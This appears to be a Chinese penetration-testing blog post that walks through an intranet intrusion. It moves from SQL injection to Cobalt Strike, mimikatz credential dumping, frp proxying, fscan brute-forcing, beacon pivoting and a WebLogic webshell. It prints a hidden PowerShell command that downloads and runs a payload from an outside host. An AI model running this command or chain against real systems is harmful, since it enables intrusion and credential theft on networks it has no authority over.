实战渗透-记一次内网渗透

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


本文主要记录内网实战学习:


外网到内网:

利用一个dba权限的sql注入,直接远程powershell上线cs

实战渗透-记一次内网渗透

实战渗透-记一次内网渗透

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxx.xxxx.xxx.xxx:8848/a'))"

目标无杀软,可以很顺利上到cs开始多人运动。


内网渗透:

根据上线的cs执行命令,发现目标存在两块网卡:

   IPv4 地址 . . . . . . . . . . . . : 10.68.1.102     子网掩码  . . . . . . . . . . . . : 255.255.255.0     默认网关. . . . . . . . . . . . . : 10.68.1.254  
以太网适配器 本地连接 2:      IPv4 地址 . . . . . . . . . . . . : 192.168.101.160     子网掩码  . . . . . . . . . . . . : 255.255.252.0   默认网关. . . . . . . . . . . . . : 192.168.100.1

然后使用cs的模块dump哈希和使用mimikatz抓取密码,成功获取到账号和密码

为方便横向移动,这里采用frp进行反向代理,代理设置了http和socks两种类型

实战渗透-记一次内网渗透

配置代理后,即可进行远程桌面连接,这里的代理工具使用了SocksCap64

实战渗透-记一次内网渗透

然后使用内网大杀器fscan对两个网段进行扫描(需要先上传到目标)

扫描后发现存在的脆弱资产很多,存在很多弱口令,然后利用收集到的账号密码进行爆破

实战渗透-记一次内网渗透

大概思路就是这样,然后使用http代理访问web服务继续进行后渗透。


不出网主机:

在内网中,发现有的机器不出网,根据中继的方法可以使目标主机上线cs:

可以利用已经上线的主机生产一个监听,然后生成对应的beacon木马,在目标上运行即可成功上线(这里使用远程桌面已经连接)

实战渗透-记一次内网渗透

实战渗透-记一次内网渗透

实战渗透-记一次内网渗透

实战渗透-记一次内网渗透

运行后不出网主机即可成功以内网出网主机作为跳板上线cs


部署weblogic获取shell:

在其中发现了一台weblogic主机,使用14882权限绕过漏洞访问到后台,然后通过部署war包进行getshell

实战渗透-记一次内网渗透

war包生成:找一个jsp马,压缩成zip,然后把zip后缀改成war即可

选择上载文件即可

实战渗透-记一次内网渗透

实战渗透-记一次内网渗透

一直下一步即可上传成功,然后使用哥斯拉进行连接:

http://url/test2/test2.jsp

实战渗透-记一次内网渗透


本文始发于微信公众号(Fight Tigers Team):实战渗透-记一次内网渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: